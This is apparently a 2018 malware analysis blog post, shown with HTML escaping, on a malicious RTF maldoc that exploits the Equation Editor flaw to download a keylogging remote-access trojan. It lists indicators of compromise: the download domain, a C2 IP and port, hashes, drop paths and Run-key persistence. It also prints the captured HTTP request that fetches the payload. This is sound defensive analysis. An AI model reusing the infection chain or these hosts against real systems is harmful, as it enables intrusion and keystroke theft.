All artifacts can be found over at my Github repo located here<\/a>. I also have the memory dump post-infection saved here<\/a> since it is too large for GitHub. Plus it gives me (and others) the ability to play with some memory forensics via Volatility. \ud83d\ude0e<\/p>\n IOCs: Artifacts: File name: outlooks.exe File name: fredi.exe File name: msdcsc.exe Analysis: I knew that this maldoc was leveraging the RTF buffer overflow via the ‘rtfobj.py’ tool as seen below:<\/p>\n Once Microsoft’s Equation Editor process started, the infection process was started. Initially it made a call out to the site thinker101[.]5gbfree[.]com to download the malicious binary:<\/p>\n which got written to the disk as “outlooks.exe” located in the “C:\\Users\\%username%\\AppData\\Roaming” folder. I then see the “outlooks.exe” process open a command prompt (which actually did pop-up on my screen – I did not get enough time to screen capture it). This prompt was due to the batch file called “fud.bat” located in the “C:\\Users\\%username%\\AppData\\Local\\Temp\\RarSFX1” folder being executed. This proceeded to start running an auto-extracting WinRAR file that had the password of ‘125’ (the use of the -p switch in the command line) which proceeded to extract the new file (fredi.exe) to “C:\\Users\\%username%\\AppData\\Local\\Temp\\RarSFX1.” Once this new process was started, it proceeded to write a new file called “msdcsc.exe” to the “C:\\Users\\%username%\\Documents\\MSDCSC” path. It is this process that is responsible for the callbacks to the C2 located at 23[.]227[.]201[.]154:1604 using some kind of encryption\/encoding.<\/p>\n The callbacks to the C2, I believe, are the things that got written to the “2018-11-05.dc” file located in the “C:\\Users\\%username%\\AppData\\Roaming\\dclogs” folder. Initially the file was pretty empty, but as I started to type and do things within the VM it started to write that stuff to the file.<\/p>\n Persistance is maintained using a pointer in the registry (HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) pointing to the “msdcsc.exe” folder.<\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/email-1.png\")
<\/a><\/p>\n
\n======
\n209.90.88.141 \/ thinker101.5gbfree.com
\n23.227.201.154:1604<\/p>\n
\n===========
\nFile name: TYN NEW INQUIRY N\u221e680231.doc
\nFile size: 8KB
\nFile path: NA
\nMD5 hash: 140c8567bbf7ca37f61b145244611bee
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/41c9b63669630cd9bfdb86e78cdb463d4c8303cea8db46c77808ce68c04acc2e\/detection<\/a>
\nDetection ratio: 34 \/ 57
\nFirst Detected: 2018-11-05 13:44:41
\nAny.Run: http:\/\/app.any.run\/tasks\/8821da7e-08b2-492c-a96a-7ead899f6be7<\/a><\/p>\n
\nFile size: 644K
\nFile path: C:\\Users\\%username%\\AppData\\Roaming
\nMD5 hash: 4fbfadbae5998f9b8c682c4ff80caa7c
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/b59fd6dc4912728b391ccc583e7731824b03305905e909709edd1f9b1486fcaf\/detection<\/a>
\nDetection ratio: 24 \/ 66
\nFirst Detected: 2018-11-05 15:46:58
\nAny.Run: http:\/\/app.any.run\/tasks\/22365a0f-8755-42f0-b139-ef45da1478d5<\/a><\/p>\n
\nFile size: 658K
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp\\RarSFX1
\nMD5 hash: 4fbfadbae5998f9b8c682c4ff80caa7c
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/b59fd6dc4912728b391ccc583e7731824b03305905e909709edd1f9b1486fcaf\/detection<\/a>
\nDetection ratio: 24 \/ 66
\nFirst Detected: 2018-11-05 15:46:58
\nAny.Run: http:\/\/app.any.run\/tasks\/22365a0f-8755-42f0-b139-ef45da1478d5<\/a><\/p>\n
\nFile size: 658K
\nFile path: C:\\Users\\%username%\\Documents\\MSDCSC
\nMD5 hash: 47210a44f7b21d09bfed1635cfe29f6f
\nVirustotal: NA
\nAny.Run: NA<\/p>\n
\n==========
\nAs seen below, the infection on the system is pretty clear cut.<\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/ProcessMonitor.png\")
<\/a><\/p>\n\r\nrtfobj TYN\\ NEW\\ INQUIRY\\ N\u221e680231.doc \r\nrtfobj 0.53.1 on Python 2.7.10 - http:\/\/decalage.info\/python\/oletools\r\nTHIS IS WORK IN PROGRESS - Check updates regularly!\r\nPlease report any issue at http:\/\/github.com\/decalage2\/oletools\/issues\r\n\r\n===============================================================================\r\nFile: 'TYN\\ NEW\\ INQUIRY\\ N\u221e680231.doc' - size: 8340 bytes\r\n---+----------+---------------------------------------------------------------\r\nid |index |OLE Object \r\n---+----------+---------------------------------------------------------------\r\n0 |0000003Ah |format_id: 2 (Embedded) \r\n | |class name: 'fDVFd2c7C4' \r\n | |data size: 4096 \r\n | |CLSID: 0002CE02-0000-0000-C000-000000000046 \r\n | |Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or \r\n | |CVE-2018-0802) \r\n---+----------+---------------------------------------------------------------\r\n<\/pre>\n
\r\nGET \/zaza\/frasd.exe HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: thinker101.5gbfree.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Mon, 05 Nov 2018 15:44:04 GMT\r\nServer: Apache\r\nLast-Modified: Mon, 05 Nov 2018 09:07:00 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 660465\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application\/x-msdownload\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n
![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/wireshark-1.png\")
<\/a><\/p>\n![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/keylogger.png\")
<\/a><\/p>\n
![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/autorun.png\")
<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"